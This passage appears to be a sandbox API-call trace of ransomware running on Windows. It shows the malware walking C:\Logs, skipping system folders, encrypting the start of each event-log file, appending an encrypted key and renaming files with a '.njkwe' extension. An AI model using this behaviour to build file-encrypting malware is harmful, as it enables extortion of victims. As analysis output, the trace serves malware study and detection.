(lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="Windows") returned -1 [0065.874] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0065.874] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="System Volume Information") returned -1 [0065.874] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="Program Files") returned -1 [0065.874] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0065.874] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 68 [0065.874] StrStrIW (lpFirst="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0065.874] lstrcmpW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.874] lstrcmpW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpString2="taridd") returned -1 [0065.874] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.874] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.874] GetTickCount () returned 0x1150de7 [0065.875] GetTickCount () returned 0x1150de7 [0065.875] GetTickCount () returned 0x1150de7 [0065.875] GetTickCount () returned 0x1150de7 [0065.875] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0065.875] GetProcessHeap () returned 0xbe0000 [0065.875] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0065.875] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.877] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.877] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0065.877] GetProcessHeap () returned 0xbe0000 [0065.877] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0065.877] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.877] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0065.879] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0065.879] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0065.879] CloseHandle (hObject=0x428) returned 1 [0066.019] GetProcessHeap () returned 0xbe0000 [0066.019] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.019] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 88 [0066.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.020] GetProcessHeap () returned 0xbe0000 [0066.020] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.020] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cAlternateFileName="MIDBEC~1.EVT")) returned 1 [0066.020] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="Windows") returned -1 [0066.020] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="$Recycle.bin") returned 1 [0066.020] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="System Volume Information") returned -1 [0066.020] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="Program Files") returned -1 [0066.020] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="Program Files (x86)") returned -1 [0066.020] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 67 [0066.020] StrStrIW (lpFirst="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpSrch=".njkwe") returned 0x0 [0066.020] lstrcmpW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.020] lstrcmpW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="taridd") returned -1 [0066.020] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.020] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.022] GetTickCount () returned 0x1150e83 [0066.022] GetTickCount () returned 0x1150e83 [0066.022] GetTickCount () returned 0x1150e83 [0066.022] GetTickCount () returned 0x1150e83 [0066.022] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.022] GetProcessHeap () returned 0xbe0000 [0066.022] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.022] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.024] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.024] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.024] GetProcessHeap () returned 0xbe0000 [0066.024] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.024] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.024] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.024] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.025] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.025] CloseHandle (hObject=0x428) returned 1 [0066.027] GetProcessHeap () returned 0xbe0000 [0066.027] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.027] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx_r00t_{3sXlE5}.njkwe") returned 87 [0066.027] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.027] GetProcessHeap () returned 0xbe0000 [0066.027] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.027] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85798667, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x85798667, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-AppxPackaging%4Operational.evtx", cAlternateFileName="MI54F1~1.EVT")) returned 1 [0066.027] lstrcmpiW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="Windows") returned -1 [0066.027] lstrcmpiW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.027] lstrcmpiW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.027] lstrcmpiW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="Program Files") returned -1 [0066.027] lstrcmpiW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.028] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 61 [0066.028] StrStrIW (lpFirst="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.028] lstrcmpW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.028] lstrcmpW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="taridd") returned -1 [0066.028] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.028] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.028] GetTickCount () returned 0x1150e83 [0066.028] GetTickCount () returned 0x1150e83 [0066.028] GetTickCount () returned 0x1150e83 [0066.028] GetTickCount () returned 0x1150e83 [0066.028] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.028] GetProcessHeap () returned 0xbe0000 [0066.028] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.028] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.031] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.031] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.032] GetProcessHeap () returned 0xbe0000 [0066.032] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.032] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.032] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.032] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.032] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.032] CloseHandle (hObject=0x428) returned 1 [0066.034] GetProcessHeap () returned 0xbe0000 [0066.034] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.034] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 81 [0066.035] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.035] GetProcessHeap () returned 0xbe0000 [0066.035] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.035] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74d25ab, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74d25ab, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cAlternateFileName="MI111F~1.EVT")) returned 1 [0066.035] lstrcmpiW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="Windows") returned -1 [0066.035] lstrcmpiW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.035] lstrcmpiW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.035] lstrcmpiW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="Program Files") returned -1 [0066.035] lstrcmpiW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.035] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 76 [0066.035] StrStrIW (lpFirst="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.035] lstrcmpW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.035] lstrcmpW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="taridd") returned -1 [0066.035] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.035] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.038] GetTickCount () returned 0x1150e83 [0066.038] GetTickCount () returned 0x1150e83 [0066.039] GetTickCount () returned 0x1150e83 [0066.039] GetTickCount () returned 0x1150e83 [0066.039] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.039] GetProcessHeap () returned 0xbe0000 [0066.039] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.039] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.045] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.045] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.045] GetProcessHeap () returned 0xbe0000 [0066.045] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.045] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.045] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.046] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.046] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.046] CloseHandle (hObject=0x428) returned 1 [0066.048] GetProcessHeap () returned 0xbe0000 [0066.048] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.048] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 96 [0066.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.048] GetProcessHeap () returned 0xbe0000 [0066.048] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.048] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1f96ca4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe1f96ca4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Bits-Client%4Operational.evtx", cAlternateFileName="MI9465~1.EVT")) returned 1 [0066.048] lstrcmpiW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="Windows") returned -1 [0066.049] lstrcmpiW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.049] lstrcmpiW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.049] lstrcmpiW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="Program Files") returned -1 [0066.049] lstrcmpiW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.049] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 59 [0066.049] StrStrIW (lpFirst="Microsoft-Windows-Bits-Client%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.049] lstrcmpW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.049] lstrcmpW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="taridd") returned -1 [0066.049] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.049] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.049] GetTickCount () returned 0x1150e93 [0066.049] GetTickCount () returned 0x1150e93 [0066.049] GetTickCount () returned 0x1150e93 [0066.049] GetTickCount () returned 0x1150e93 [0066.049] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.049] GetProcessHeap () returned 0xbe0000 [0066.049] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.049] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.055] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.057] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.058] GetProcessHeap () returned 0xbe0000 [0066.058] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 